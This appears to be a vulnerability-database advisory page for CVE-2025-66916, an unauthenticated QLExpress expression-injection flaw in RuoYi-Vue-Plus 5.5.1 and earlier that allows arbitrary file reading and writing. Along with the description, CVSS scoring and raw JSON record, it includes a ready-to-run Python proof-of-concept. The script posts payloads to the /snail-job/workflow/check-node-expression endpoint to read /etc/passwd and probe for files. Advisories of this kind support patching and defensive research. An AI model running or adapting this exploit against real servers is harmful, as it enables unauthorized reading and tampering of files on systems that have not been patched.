Security Vulnerability Report
中文
CVE-2025-66916 CVSS 9.4 CRITICAL

CVE-2025-66916

Published: 2026-01-08 20:15:45
Last Modified: 2026-01-30 01:05:34
Source: [email protected]

Description

The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier, interface /snail-job/workflow/check-node-expression can execute QLExpress expressions, but it does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing.

CVSS Details

CVSS Score
9.4
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:dromara:ruoyi-vue-plus:*:*:*:*:*:*:*:* - VULNERABLE
RuoYi-Vue-Plus < 5.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-66916 PoC - RuoYi-Vue-Plus QLExpress Expression Injection # Target: /snail-job/workflow/check-node-expression TARGET_URL = "http://target.com/snail-job/workflow/check-node-expression" # Read arbitrary file PAYLOAD_READ = """ new java.io.FileInputStream("/etc/passwd").readAllBytes() """ # Check file existence PAYLOAD_CHECK = """ new java.io.File("/etc/hosts").exists() """ def exploit(target_url, payload): headers = { "Content-Type": "application/json", "User-Agent": "Mozilla/5.0" } data = { "expression": payload.strip() } try: response = requests.post(target_url, json=data, headers=headers, timeout=10) print(f"[+] Status Code: {response.status_code}") print(f"[+] Response: {response.text}") return response.json() except Exception as e: print(f"[-] Error: {str(e)}") return None if __name__ == "__main__": print("[*] CVE-2025-66916 QLExpress Expression Injection PoC") print("[*] Target: " + TARGET_URL) print("\n[>] Testing file existence check...") exploit(TARGET_URL, PAYLOAD_CHECK) print("\n[>] Testing arbitrary file read...") exploit(TARGET_URL, PAYLOAD_READ)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66916", "sourceIdentifier": "[email protected]", "published": "2026-01-08T20:15:44.657", "lastModified": "2026-01-30T01:05:34.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The snailjob component in RuoYi-Vue-Plus versions 5.5.1 and earlier, interface /snail-job/workflow/check-node-expression can execute QLExpress expressions, but it does not filter user input, allowing attackers to use the File class to perform arbitrary file reading and writing."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 5.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dromara:ruoyi-vue-plus:*:*:*:*:*:*:*:*", "versionEndIncluding": "5.5.1", "matchCriteriaId": "E7726AD6-68C7-4949-BBAC-725F3D2ECAC1"}]}]}], "references": [{"url": "https://gist.github.com/Catherines77/e3f06b9c4cc6298579e858088a243c3d", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://gitee.com/dromara/RuoYi-Vue-Plus", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Catherines77/code-au/blob/main/ruoyi-vue-plus/QLExpress.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.